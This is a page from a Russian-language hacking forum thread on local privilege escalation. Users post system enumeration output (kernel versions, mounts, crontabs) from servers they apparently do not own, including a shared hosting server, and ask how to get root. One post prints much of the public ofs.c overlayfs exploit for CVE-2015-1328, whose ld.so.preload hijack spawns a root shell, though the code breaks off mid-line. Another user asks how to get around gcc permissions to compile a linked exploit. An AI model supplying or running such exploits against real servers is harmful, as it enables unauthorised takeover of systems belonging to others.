HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Повышение прав [задай вопрос - получи ответ]
   
Ответ
Страница 60 из 74 « Первая < 1050 56 57 58 59 60 61 62 63 64 70 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #591  
Старый 01.08.2015, 17:37
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707

Репутация: 935


По умолчанию
Цитата:
Сообщение от d4rk73rr0r  

Подскажите пожалуйста, можно ли рутить этот сервер?
$ uname -a 2>&1
Код:
Linux zdes byl hostname 3.13.0-40-generic #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ ls -la /boot 2>&1
Код:
total 652860
drwxr-xr-x  3 root root    12288 Jun 20 08:15 .
drwxr-xr-x 24 root root     4096 Jun 16 08:07 ..
-rw-------  1 root root  3372643 May  3  2014 System.map-3.13.0-24-generic
-rw-------  1 root root  3378267 Jun  5  2014 System.map-3.13.0-29-generic
-rw-------  1 root root  3378641 Jul  5  2014 System.map-3.13.0-30-generic
-rw-------  1 root root  3381262 Jul 15  2014 System.map-3.13.0-32-generic
-rw-------  1 root root  3381262 Jul 29  2014 System.map-3.13.0-33-generic
-rw-------  1 root root  3381262 Aug 13  2014 System.map-3.13.0-34-generic
-rw-------  1 root root  3386444 Aug 15  2014 System.map-3.13.0-35-generic
-rw-------  1 root root  3386479 Sep  4  2014 System.map-3.13.0-36-generic
-rw-------  1 root root  3386945 Sep 23  2014 System.map-3.13.0-37-generic
-rw-------  1 root root  3386936 Oct 28  2014 System.map-3.13.0-39-generic
-rw-------  1 root root  3387231 Nov 13  2014 System.map-3.13.0-40-generic
-rw-------  1 root root  3388792 Nov 25  2014 System.map-3.13.0-41-generic
-rw-------  1 root root  3388760 Dec  9  2014 System.map-3.13.0-43-generic
-rw-------  1 root root  3388834 Dec 16  2014 System.map-3.13.0-44-generic
-rw-------  1 root root  3389458 Mar 11 01:43 System.map-3.13.0-46-generic
-rw-------  1 root root  3389235 Mar 12 16:52 System.map-3.13.0-48-generic
-rw-------  1 root root  3389437 Apr 11 02:05 System.map-3.13.0-49-generic
-rw-------  1 root root  3389875 Apr 15 18:03 System.map-3.13.0-51-generic
-rw-------  1 root root  3389875 May  4 10:09 System.map-3.13.0-52-generic
-rw-------  1 root root  3390132 May 20 16:11 System.map-3.13.0-53-generic
-rw-------  1 root root  3390881 May 27 01:11 System.map-3.13.0-54-generic
-rw-------  1 root root  3390881 Jun 18 06:03 System.map-3.13.0-55-generic
-rw-r--r--  1 root root  1158016 May  3  2014 abi-3.13.0-24-generic
-rw-r--r--  1 root root  1161764 Jun  5  2014 abi-3.13.0-29-generic
-rw-r--r--  1 root root  1162257 Jul  5  2014 abi-3.13.0-30-generic
-rw-r--r--  1 root root  1162712 Jul 15  2014 abi-3.13.0-32-generic
-rw-r--r--  1 root root  1162712 Jul 29  2014 abi-3.13.0-33-generic
-rw-r--r--  1 root root  1162712 Aug 13  2014 abi-3.13.0-34-generic
-rw-r--r--  1 root root  1163858 Aug 15  2014 abi-3.13.0-35-generic
-rw-r--r--  1 root root  1163858 Sep  4  2014 abi-3.13.0-36-generic
-rw-r--r--  1 root root  1164489 Sep 23  2014 abi-3.13.0-37-generic
-rw-r--r--  1 root root  1164547 Oct 28  2014 abi-3.13.0-39-generic
-rw-r--r--  1 root root  1164509 Nov 13  2014 abi-3.13.0-40-generic
-rw-r--r--  1 root root  1164720 Nov 25  2014 abi-3.13.0-41-generic
-rw-r--r--  1 root root  1164720 Dec  9  2014 abi-3.13.0-43-generic
-rw-r--r--  1 root root  1164720 Dec 16  2014 abi-3.13.0-44-generic
-rw-r--r--  1 root root  1164852 Mar 11 01:43 abi-3.13.0-46-generic
-rw-r--r--  1 root root  1164723 Mar 12 16:52 abi-3.13.0-48-generic
-rw-r--r--  1 root root  1164723 Apr 11 02:05 abi-3.13.0-49-generic
-rw-r--r--  1 root root  1164671 Apr 15 18:03 abi-3.13.0-51-generic
-rw-r--r--  1 root root  1164671 May  4 10:09 abi-3.13.0-52-generic
-rw-r--r--  1 root root  1164671 May 20 16:11 abi-3.13.0-53-generic
-rw-r--r--  1 root root  1164806 May 27 01:11 abi-3.13.0-54-generic
-rw-r--r--  1 root root  1164806 Jun 18 06:03 abi-3.13.0-55-generic
-rw-r--r--  1 root root   165510 May  3  2014 config-3.13.0-24-generic
-rw-r--r--  1 root root   165544 Jun  5  2014 config-3.13.0-29-generic
-rw-r--r--  1 root root   165576 Jul  5  2014 config-3.13.0-30-generic
-rw-r--r--  1 root root   165611 Jul 15  2014 config-3.13.0-32-generic
-rw-r--r--  1 root root   165611 Jul 29  2014 config-3.13.0-33-generic
-rw-r--r--  1 root root   165611 Aug 13  2014 config-3.13.0-34-generic
-rw-r--r--  1 root root   165652 Aug 15  2014 config-3.13.0-35-generic
-rw-r--r--  1 root root   165671 Sep  4  2014 config-3.13.0-36-generic
-rw-r--r--  1 root root   165712 Sep 23  2014 config-3.13.0-37-generic
-rw-r--r--  1 root root   165712 Oct 28  2014 config-3.13.0-39-generic
-rw-r--r--  1 root root   165745 Nov 13  2014 config-3.13.0-40-generic
-rw-r--r--  1 root root   165745 Nov 25  2014 config-3.13.0-41-generic
-rw-r--r--  1 root root   165745 Dec  9  2014 config-3.13.0-43-generic
-rw-r--r--  1 root root   165748 Dec 16  2014 config-3.13.0-44-generic
-rw-r--r--  1 root root   165748 Mar 11 01:43 config-3.13.0-46-generic
-rw-r--r--  1 root root   165773 Mar 12 16:52 config-3.13.0-48-generic
-rw-r--r--  1 root root   165773 Apr 11 02:05 config-3.13.0-49-generic
-rw-r--r--  1 root root   165762 Apr 15 18:03 config-3.13.0-51-generic
-rw-r--r--  1 root root   165762 May  4 10:09 config-3.13.0-52-generic
-rw-r--r--  1 root root   165762 May 20 16:11 config-3.13.0-53-generic
-rw-r--r--  1 root root   165762 May 27 01:11 config-3.13.0-54-generic
-rw-r--r--  1 root root   165762 Jun 18 06:03 config-3.13.0-55-generic
drwxr-xr-x  5 root root     4096 Jun 20 08:15 grub
-rw-r--r--  1 root root 19692919 Jun 25  2014 initrd.img-3.13.0-24-generic
-rw-r--r--  1 root root 19693496 Jun 25  2014 initrd.img-3.13.0-29-generic
-rw-r--r--  1 root root 19802843 Jul 10  2014 initrd.img-3.13.0-30-generic
-rw-r--r--  1 root root 19805892 Jul 30  2014 initrd.img-3.13.0-32-generic
-rw-r--r--  1 root root 19806330 Aug 12  2014 initrd.img-3.13.0-33-generic
-rw-r--r--  1 root root 19807084 Aug 14  2014 initrd.img-3.13.0-34-generic
-rw-r--r--  1 root root 19814700 Aug 29  2014 initrd.img-3.13.0-35-generic
-rw-r--r--  1 root root 19827146 Sep 23  2014 initrd.img-3.13.0-36-generic
-rw-r--r--  1 root root 19826914 Oct  9  2014 initrd.img-3.13.0-37-generic
-rw-r--r--  1 root root 19826798 Oct 30  2014 initrd.img-3.13.0-39-generic
-rw-r--r--  1 root root 19831562 Nov 25  2014 initrd.img-3.13.0-40-generic
-rw-r--r--  1 root root 19857194 Dec 11  2014 initrd.img-3.13.0-41-generic
-rw-r--r--  1 root root 19858798 Dec 12  2014 initrd.img-3.13.0-43-generic
-rw-r--r--  1 root root 19860064 Jan 13  2015 initrd.img-3.13.0-44-generic
-rw-r--r--  1 root root 19863695 Mar 12 07:53 initrd.img-3.13.0-46-generic
-rw-r--r--  1 root root 19862856 Mar 24 07:52 initrd.img-3.13.0-48-generic
-rw-r--r--  1 root root 19864189 Apr 14 08:09 initrd.img-3.13.0-49-generic
-rw-r--r--  1 root root 19862129 Apr 30 08:11 initrd.img-3.13.0-51-generic
-rw-r--r--  1 root root 19865264 May  7 08:07 initrd.img-3.13.0-52-generic
-rw-r--r--  1 root root 19864608 May 22 08:48 initrd.img-3.13.0-53-generic
-rw-r--r--  1 root root 19864503 Jun 11 08:24 initrd.img-3.13.0-54-generic
-rw-r--r--  1 root root 19863440 Jun 20 08:15 initrd.img-3.13.0-55-generic
-rw-r--r--  1 root root   176500 Mar 12  2014 memtest86+.bin
-rw-r--r--  1 root root   178176 Mar 12  2014 memtest86+.elf
-rw-r--r--  1 root root   178680 Mar 12  2014 memtest86+_multiboot.bin
-rw-------  1 root root  5776416 May  3  2014 vmlinuz-3.13.0-24-generic
-rw-------  1 root root  5792544 Jun  5  2014 vmlinuz-3.13.0-29-generic
-rw-------  1 root root  5792608 Jul  5  2014 vmlinuz-3.13.0-30-generic
-rw-------  1 root root  5798112 Jul 15  2014 vmlinuz-3.13.0-32-generic
-rw-------  1 root root  5798688 Jul 29  2014 vmlinuz-3.13.0-33-generic
-rw-------  1 root root  5797728 Aug 13  2014 vmlinuz-3.13.0-34-generic
-rw-------  1 root root  5806368 Aug 15  2014 vmlinuz-3.13.0-35-generic
-rw-------  1 root root  5806848 Sep  4  2014 vmlinuz-3.13.0-36-generic
-rw-------  1 root root  5808832 Sep 23  2014 vmlinuz-3.13.0-37-generic
-rw-------  1 root root  5808544 Oct 28  2014 vmlinuz-3.13.0-39-generic
-rw-------  1 root root  5808960 Nov 13  2014 vmlinuz-3.13.0-40-generic
-rw-------  1 root root  5814112 Nov 25  2014 vmlinuz-3.13.0-41-generic
-rw-------  1 root root  5814080 Dec  9  2014 vmlinuz-3.13.0-43-generic
-rw-------  1 root root  5814496 Dec 16  2014 vmlinuz-3.13.0-44-generic
-rw-------  1 root root  5814592 Mar 11 01:43 vmlinuz-3.13.0-46-generic
-rw-------  1 root root  5815680 Mar 12 16:52 vmlinuz-3.13.0-48-generic
-rw-------  1 root root  5815392 Apr 11 02:05 vmlinuz-3.13.0-49-generic
-rw-------  1 root root  5818368 Apr 15 18:03 vmlinuz-3.13.0-51-generic
-rw-------  1 root root  5818592 May  4 10:09 vmlinuz-3.13.0-52-generic
-rw-------  1 root root  5821152 May 20 16:11 vmlinuz-3.13.0-53-generic
-rw-------  1 root root  5821664 May 27 01:11 vmlinuz-3.13.0-54-generic
-rw-------  1 root root  5821984 Jun 18 06:03 vmlinuz-3.13.0-55-generic
ls -la --full-time /lib 2>&1
Код:
total 312
drwxr-xr-x 23 root root  4096 2015-02-27 08:01:04.121244740 +0500 .
drwxr-xr-x 24 root root  4096 2015-06-16 08:07:45.004506276 +0500 ..
drwxr-xr-x  2 root root  4096 2014-11-21 07:40:33.676606953 +0500 apparmor
lrwxrwxrwx  1 root root    21 2014-07-11 16:04:40.744028161 +0500 cpp -> /etc/alternatives/cpp
drwxr-xr-x  3 root root  4096 2014-06-24 11:04:14.153311413 +0500 crda
drwxr-xr-x 81 root root 20480 2015-06-16 08:07:19.308506965 +0500 firmware
drwxr-xr-x  2 root root  4096 2014-06-24 11:08:09.613305094 +0500 hdparm
drwxr-xr-x  2 root root 12288 2015-02-27 08:01:04.121244740 +0500 i386-linux-gnu
drwxr-xr-x  2 root root  4096 2014-06-27 11:51:14.108394221 +0500 ifupdown
drwxr-xr-x  2 root root  4096 2014-07-30 11:27:25.309402444 +0500 init
-rwxr-xr-x  1 root root 71512 2013-12-24 07:51:15.000000000 +0500 klibc-P2s_k-gf23VtrGgO2_4pGkQgwMY.so
lrwxrwxrwx  1 root root    25 2015-02-25 21:58:43.000000000 +0500 ld-linux.so.2 -> i386-linux-gnu/ld-2.19.so
lrwxrwxrwx  1 root root    17 2014-01-09 03:32:00.000000000 +0500 libip4tc.so.0 -> libip4tc.so.0.1.0
-rw-r--r--  1 root root 27392 2014-01-09 03:32:05.000000000 +0500 libip4tc.so.0.1.0
lrwxrwxrwx  1 root root    17 2014-01-09 03:32:00.000000000 +0500 libip6tc.so.0 -> libip6tc.so.0.1.0
-rw-r--r--  1 root root 31520 2014-01-09 03:32:05.000000000 +0500 libip6tc.so.0.1.0
lrwxrwxrwx  1 root root    16 2014-01-09 03:32:00.000000000 +0500 libiptc.so.0 -> libiptc.so.0.0.0
-rw-r--r--  1 root root  5816 2014-01-09 03:32:05.000000000 +0500 libiptc.so.0.0.0
lrwxrwxrwx  1 root root    20 2014-01-09 03:32:00.000000000 +0500 libxtables.so.10 -> libxtables.so.10.0.0
-rw-r--r--  1 root root 47712 2014-01-09 03:32:06.000000000 +0500 libxtables.so.10.0.0
drwxr-xr-x  3 root root  4096 2014-06-24 11:03:45.029312194 +0500 lsb
drwxr-xr-x  2 root root  4096 2015-06-20 08:14:04.183221689 +0500 modprobe.d
drwxr-xr-x 24 root root  4096 2015-06-16 08:07:17.752507007 +0500 modules
drwxr-xr-x  2 root root  4096 2015-05-22 08:46:32.470408887 +0500 modules-load.d
drwxr-xr-x  3 root root  4096 2014-06-24 11:03:45.029312194 +0500 plymouth
drwxr-xr-x  3 root root  4096 2014-06-24 11:10:30.041301325 +0500 recovery-mode
drwxr-xr-x  2 root root  4096 2014-06-27 11:51:03.188394514 +0500 resolvconf
drwxr-xr-x  2 root root  4096 2014-07-11 15:54:31.320044515 +0500 security
drwxr-xr-x  3 root root  4096 2014-07-10 17:19:11.242226794 +0500 systemd
drwxr-xr-x 15 root root  4096 2014-06-24 11:03:45.029312194 +0500 terminfo
drwxr-xr-x  4 root root  4096 2014-07-11 15:54:50.304044005 +0500 udev
drwxr-xr-x  2 root root  4096 2014-06-24 11:12:34.149297995 +0500 ufw
drwxr-xr-x  4 root root 12288 2015-06-12 08:11:58.733773878 +0500 x86_64-linux-gnu
drwxr-xr-x  2 root root  4096 2014-06-24 11:08:13.173304998 +0500 xtables
ls -la --full-time /lib64 2>&1
Код:
total 8
drwxr-xr-x  2 root root 4096 2015-02-27 08:01:05.833244694 +0500 .
drwxr-xr-x 24 root root 4096 2015-06-16 08:07:45.004506276 +0500 ..
lrwxrwxrwx  1 root root   32 2015-02-25 21:56:31.000000000 +0500 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so
$ mount 2>&1
Код:
/dev/md0 on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/cgroup type tmpfs (rw)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
none on /sys/fs/pstore type pstore (rw)
/dev/md1 on /opt type ext4 (rw,usrquota)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
$ df -h 2>&1
Код:
Filesystem      Size  Used Avail Use% Mounted on
/dev/md0        459G  215G  221G  50% /
none            4.0K     0  4.0K   0% /sys/fs/cgroup
udev            3.8G  4.0K  3.8G   1% /dev
tmpfs           768M  1.8M  767M   1% /run
none            5.0M     0  5.0M   0% /run/lock
none            3.8G   16K  3.8G   1% /run/shm
none            100M     0  100M   0% /run/user
/dev/md1        1.8T   48G  1.7T   3% /opt
$ cat /etc/issue 2>&1
Код:
Ubuntu 14.04.1 LTS \n \l
$ cat /etc/crontab 2>&1
Код:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

# ClamAV refresh virus databases
30 1    * * *    root    freshclam >/dev/null 2>&1

# ClamAV checking vhosts directory and sending email to admins
0 2    * * *    root    /adm/clamav.sh >/dev/null 2>&1
$ ls -la /etc/cron.d 2>&1
Код:
total 44
drwxr-xr-x   2 root root  4096 Apr 21 08:16 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r--   1 root root   102 Feb  9  2013 .placeholder
-rw-------   1 root root   260 Jul 11  2014 awstats
-rw-r--r--   1 root root  1566 Feb  3  2014 mailman
-rw-r--r--   1 root root   589 Feb 28  2014 mdadm
-rw-r--r--   1 root root   510 Jul  7  2014 php5
-rw-r--r--   1 root root   110 Jul 11  2014 plesk-backup-manager-task
-rw-r--r--   1 root root   156 Aug  7  2014 plesk-outgoing-mail-statistics-poller
$ ls -la /etc/cron.hourly 2>&1
Код:
total 20
drwxr-xr-x   2 root root  4096 Jun 24  2014 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r--   1 root root   102 Feb  9  2013 .placeholder
$ ls -la /etc/cron.monthly 2>&1
Код:
total 24
drwxr-xr-x   2 root root  4096 Jul 11  2014 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r--   1 root root   102 Feb  9  2013 .placeholder
-rwxr-xr-x   1 root root   190 Jun 25  2014 50plesk-monthly
$ ls -la /etc/cron.weekly 2>&1
Код:
total 40
drwxr-xr-x   2 root root  4096 Jul 11  2014 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r--   1 root root   102 Feb  9  2013 .placeholder
-rwxr-xr-x   1 root root   189 Jun 25  2014 50plesk-weekly
-rwxr-xr-x   1 root root   730 Feb 23  2014 apt-xapian-index
-rwxr-xr-x   1 root root   427 Apr 16  2014 fstrim
-rwxr-xr-x   1 root root   771 Apr 10  2014 man-db
-rwxr-xr-x   1 root root   211 Apr 10  2014 update-notifier-common
$ cat /proc/version 2>&1
Код:
Linux version 3.13.0-40-generic (buildd@comet) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014
$ cat /proc/sys/vm/mmap_min_addr 2>&1
Код:
65536
$ ls -la /usr/bin/staprun 2>&1
Код:
ls: cannot access /usr/bin/staprun: No such file or directory
$ pwd 2>&1
Код:
/opt/www/vhosts/hostname.domain/logs
[CODE]
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= *=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000( user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= *=*=*=*=*=*
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define LIB "#include \n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
char *file;
system("rm -rf /tmp/ns_sploit");
mkdir("/tmp/ns_sploit", 0777);
mkdir("/tmp/ns_sploit/work", 0777);
mkdir("/tmp/ns_sploit/upper",0777);
mkdir("/tmp/ns_sploit/o",0777);

fprintf(stderr,"mount #1\n");
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
exit(-1);
}
file = ".access";
chmod("/tmp/ns_sploit/work/work",0777);
} else file = "ns_last_pid";

chdir("/tmp/ns_sploit/o");
rename(file,"ld.so.preload");

chdir("/");
umount("/tmp/ns_sploit/o");
fprintf(stderr,"mount #2\n");
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
exit(-1);
}
chmod("/tmp/ns_sploit/work/work",0777);
}

chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
int status, fd, lib;
pid_t wrapper, init;
int clone_flags = CLONE_NEWNS | SIGCHLD;

fprintf(stderr,"spawning threads\n");

if((wrapper = fork()) == 0) {
if(unshare(CLONE_NEWUSER) != 0)
fprintf(stderr, "failed to create new user namespace\n");

if((init = fork()) == 0) {
pid_t pid =
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
if(pid
 
Ответить с цитированием

  #592  
Старый 13.08.2015, 17:22
powerOfthemind
Познающий
Регистрация: 31.07.2015
Сообщений: 41
Провел на форуме:
9212

Репутация: 1
По умолчанию
uname -a

Код:
Linux vh16.hosting.ua 2.6.18-371.3.1.el5PAE #1 SMP Thu Dec 5 13:29:20 EST 2013 i
686 i686 i386 GNU/Linux
ls -la /boot

Код:
total 39154
drwxr-xr-x  5 root root    5120 Apr  8 13:07 .
drwxr-xr-x 28 root root    4096 Aug 10 03:00 ..
-rw-r--r--  1 root root     163 Jan  6  2011 .vmlinuz-2.6.18-194.32.1.el5.hmac
-rw-r--r--  1 root root     158 Apr  2  2010 .vmlinuz-2.6.18-194.el5.hmac
-rw-r--r--  1 root root     166 Sep 26  2013 .vmlinuz-2.6.18-348.18.1.el5PAE.hma
c
-rw-r--r--  1 root root     165 Dec  5  2013 .vmlinuz-2.6.18-371.3.1.el5PAE.hmac

-rw-r--r--  1 root root     165 Jun 11  2014 .vmlinuz-2.6.18-371.9.1.el5PAE.hmac

-rw-r--r--  1 root root     161 Sep 17  2014 .vmlinuz-2.6.18-398.el5PAE.hmac
-rw-r--r--  1 root root     161 Apr  7 20:53 .vmlinuz-2.6.18-404.el5PAE.hmac
-rw-r--r--  1 root root  971511 Jan  6  2011 System.map-2.6.18-194.32.1.el5
-rw-r--r--  1 root root  967675 Apr  2  2010 System.map-2.6.18-194.el5
-rw-r--r--  1 root root  993118 Sep 26  2013 System.map-2.6.18-348.18.1.el5PAE
-rw-r--r--  1 root root  993780 Dec  5  2013 System.map-2.6.18-371.3.1.el5PAE
-rw-r--r--  1 root root  993835 Jun 11  2014 System.map-2.6.18-371.9.1.el5PAE
-rw-r--r--  1 root root  993998 Sep 17  2014 System.map-2.6.18-398.el5PAE
-rw-r--r--  1 root root  994152 Apr  7 20:53 System.map-2.6.18-404.el5PAE
-rw-r--r--  1 root root   69598 Jan  6  2011 config-2.6.18-194.32.1.el5
-rw-r--r--  1 root root   69593 Apr  2  2010 config-2.6.18-194.el5
-rw-r--r--  1 root root   70337 Sep 26  2013 config-2.6.18-348.18.1.el5PAE
-rw-r--r--  1 root root   70357 Dec  5  2013 config-2.6.18-371.3.1.el5PAE
-rw-r--r--  1 root root   70357 Jun 11  2014 config-2.6.18-371.9.1.el5PAE
-rw-r--r--  1 root root   70353 Sep 17  2014 config-2.6.18-398.el5PAE
-rw-r--r--  1 root root   70353 Apr  7 20:53 config-2.6.18-404.el5PAE
drwxr-xr-x  2 root root    1024 May  4  2010 extlinux
drwxr-xr-x  2 root root    1024 Apr  8 13:07 grub
-rw-------  1 root root 2599913 Jan 25  2011 initrd-2.6.18-194.32.1.el5.img
-rw-------  1 root root 2569559 Jan 25  2011 initrd-2.6.18-194.el5.img
-rw-------  1 root root 2615526 Oct 14  2013 initrd-2.6.18-348.18.1.el5PAE.img
-rw-------  1 root root 2615834 Jan 24  2014 initrd-2.6.18-371.3.1.el5PAE.img
-rw-------  1 root root 2616679 Jun 12  2014 initrd-2.6.18-371.9.1.el5PAE.img
-rw-------  1 root root 2616919 Dec  2  2014 initrd-2.6.18-398.el5PAE.img
-rw-------  1 root root 2616967 Apr  8 13:07 initrd-2.6.18-404.el5PAE.img
drwx------  2 root root   12288 Jan  1  2009 lost+found
-rw-r--r--  1 root root   80032 Mar 12  2009 message
-rw-r--r--  1 root root  111346 Jan  6  2011 symvers-2.6.18-194.32.1.el5.gz
-rw-r--r--  1 root root  110979 Apr  2  2010 symvers-2.6.18-194.el5.gz
-rw-r--r--  1 root root  117369 Sep 26  2013 symvers-2.6.18-348.18.1.el5PAE.gz
-rw-r--r--  1 root root  117471 Dec  5  2013 symvers-2.6.18-371.3.1.el5PAE.gz
-rw-r--r--  1 root root  117487 Jun 11  2014 symvers-2.6.18-371.9.1.el5PAE.gz
-rw-r--r--  1 root root  117549 Sep 17  2014 symvers-2.6.18-398.el5PAE.gz
-rw-r--r--  1 root root  117561 Apr  7 20:53 symvers-2.6.18-404.el5PAE.gz
-rw-r--r--  1 root root 1877108 Jan  6  2011 vmlinuz-2.6.18-194.32.1.el5
-rw-r--r--  1 root root 1875796 Apr  2  2010 vmlinuz-2.6.18-194.el5
-rw-r--r--  1 root root 1908212 Sep 26  2013 vmlinuz-2.6.18-348.18.1.el5PAE
-rw-r--r--  1 root root 1909108 Dec  5  2013 vmlinuz-2.6.18-371.3.1.el5PAE
-rw-r--r--  1 root root 1909140 Jun 11  2014 vmlinuz-2.6.18-371.9.1.el5PAE
-rw-r--r--  1 root root 1910164 Sep 17  2014 vmlinuz-2.6.18-398.el5PAE
-rw-r--r--  1 root root 1910324 Apr  7 20:53 vmlinuz-2.6.18-404.el5PAE
mount

Код:
/dev/md3 on / type ext3 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/md4 on /tmp type ext3 (rw,noexec,nosuid,nodev,noatime)
/dev/md2 on /boot type ext3 (rw)
/dev/md1 on /var type ext3 (rw,noatime)
/dev/md0 on /hsphere type ext3 (rw,noatime,usrquota,data=writeback)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
df -h

Код:
Filesystem            Size  Used Avail Use% Mounted on
/dev/md3               15G  6.8G  7.1G  49% /
/dev/md4              4.9G  2.6G  2.1G  56% /tmp
/dev/md2              198M   46M  143M  25% /boot
/dev/md1              436G   21G  393G   6% /var
/dev/md0              417G  135G  260G  35% /hsphere
tmpfs                 5.9G     0  5.9G   0% /dev/shm
cat /etc/issue

Код:
CentOS release 5.5 (Final
Kernel \r on an \m
cat /proc/version

Код:
Linux version 2.6.18-371.3.1.el5PAE (mockbuild@builder10.centos.org) (gcc versio
n 4.1.2 20080704 (Red Hat 4.1.2-54)) #1 SMP Thu Dec 5 13:29:20 EST 2013
cat /proc/sys/vm/mmap_min_addr

4096

Использую этот эксполит https://www.exploit-db.com/exploits/10613/

Но при его копиляции пишет что недостаточно прав gcc, можно это обойти ?gcc установлены права 750

И вопрос ,я правельный экполит выбрал?? Ешё только учусь.
 
Ответить с цитированием

  #593  
Старый 13.08.2015, 18:41
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418

Репутация: 652


По умолчанию
Цитата:
Сообщение от powerOfthemind  

uname -a
Код:
Linux vh16.hosting.ua 2.6.18-371.3.1.el5PAE #1 SMP Thu Dec 5 13:29:20 EST 2013 i
686 i686 i386 GNU/Linux
